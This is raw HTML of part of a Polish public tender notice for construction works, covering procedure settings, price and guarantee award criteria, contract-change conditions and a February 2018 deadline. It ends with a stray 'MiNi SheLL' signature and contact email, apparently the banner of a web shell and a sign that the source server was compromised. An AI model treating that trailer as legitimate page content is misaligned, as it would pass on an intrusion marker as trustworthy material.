Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Dopuszczalna jest zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadkach oraz na warunkach przewidzianych w ogłoszeniu o zamówieniu i specyfikacji istotnych warunków zamówienia właściwej dla przetargu, o którym mowa w niniejszej umowie, tj. w sytuacji, o której mowa w § 5 ust. 1.2.	Zamawiający dopuszcza zmianę terminu realizacji przedmiotu umowy w przypadku wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji zamówienia określonego w umowie w § 3 ust. 2 ze względu na:a)	brak możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych (o czas, w którym - na skutek tych zdarzeń - nie było możliwe wykonanie umowy i na który - w ich wyniku - jej wykonanie zostało przerwane) lubb)	działanie siły wyższej w rozumieniu przepisów Kodeksu cywilnego (o czas niezbędny do wykonania zamówienia) lubc)	wstrzymanie prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę (o czas, w którym - na skutek tych zdarzeń - nie było możliwe wykonanie umowyi na który - w ich wyniku - jej wykonanie zostało przerwane).3.	W przypadku wystąpienia co najmniej jednej z okoliczności wymienionej w ust. 2 - termin umowny ulegnie przedłużeniu o czas niezbędny do zakończenia wykonywania przedmiotu umowy, jednak nie dłuższy niż czas trwania przeszkody.4.	O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów, Wykonawca winien poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.5.	Zamawiający dopuszcza zmianę wynagrodzenia w przypadku zmniejszenia zakresu robót. Wynagrodzenie Wykonawcy zostanie odpowiednio pomniejszone o wartość robót, o które pomniejszono zakres przedmiotu umowy. Wartość tych robót zostanie wyliczona na podstawie informacji o stawkach robocizny kosztorysowej oraz o cenach pracy sprzętu budowlanego i materiałów budowlanych.6.	Zakazuje się zmian postanowień zawartej umowy lub umowy ramowej w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, że zachodzi co najmniej jednaz następujących okoliczności:1)	zmiany dotyczą realizacji dodatkowych dostaw, usług lub robót budowlanychod dotychczasowego Wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne i zostały spełnione łącznie następujące warunki:a)	zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego,b) zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla Zamawiającego,c) wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie lub umowie ramowej;2) zostały spełnione łącznie następujące warunki:a) konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć, b) wartość zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie;3) Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca:a) na podstawie postanowień umownych,b) w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy,c) w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego podwykonawców;4) zmiany, niezależnie od ich wartości, nie są istotne w rozumieniu ust. 7;5) łączna wartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 uPzp i jest mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie w przypadku zamówień na usługi lub dostawy albo w przypadku zamówień na roboty budowlane - jest mniejsza od 15% wartości zamówienia określonej pierwotnie w umowie.7.	Zmianę postanowień zawartych w umowie uznaje się za istotną, jeżeli:1)	zmienia ogólny charakter umowy w stosunku do charakteru umowy lub umowy ramowej w pierwotnym brzmieniu;2)	nie zmienia ogólnego charakteru umowy i zachodzi co najmniej jedna z następujących okoliczności:a)	zmiana wprowadza warunki, które, gdyby były postawione w postępowaniu o udzielenie zamówienia, to w tym postępowaniu wzięliby lub mogliby wziąć udział inni Wykonawcy lub przyjęto by oferty innej treści,b)	zmiana narusza równowagę ekonomiczną umowy na korzyść Wykonawcy w sposób nieprzewidziany pierwotnie w umowie lub umowie ramowej,c)	zmiana znacznie rozszerza lub zmniejsza zakres świadczeń i zobowiązań wynikający z umowy,d)	polega na zastąpieniu Wykonawcy, któremu Zamawiający udzielił zamówienia, nowym Wykonawcą, w przypadkach innych niż wymienione w ust. 6 pkt 3.8.	Zamawiający dopuszcza zaistnienie innych sytuacji, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych, tj. nie odnoszących się do kwestii, które podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie wszczęcia procedury mającej na celu wybór Wykonawcy, nie miałyby wpływu na udział większej ilości podmiotów zainteresowanych tą procedurą. 9.	W szczególności zmiany mogą dotyczyć sposobu wykonania robót lub ich zakresu, jeżeli w trakcie realizacji pojawią się okoliczności uzasadniające powyższe, a wynikające z uzyskanych uzgodnień i opinii, uwarunkowań technicznych, gruntowych lub dokumentacyjnych.10.	Zmiany i uzupełnienia treści niniejszej umowy wymagają formy pisemnej pod rygorem nieważności i muszą być zaakceptowane przez obie strony.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-02-26</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com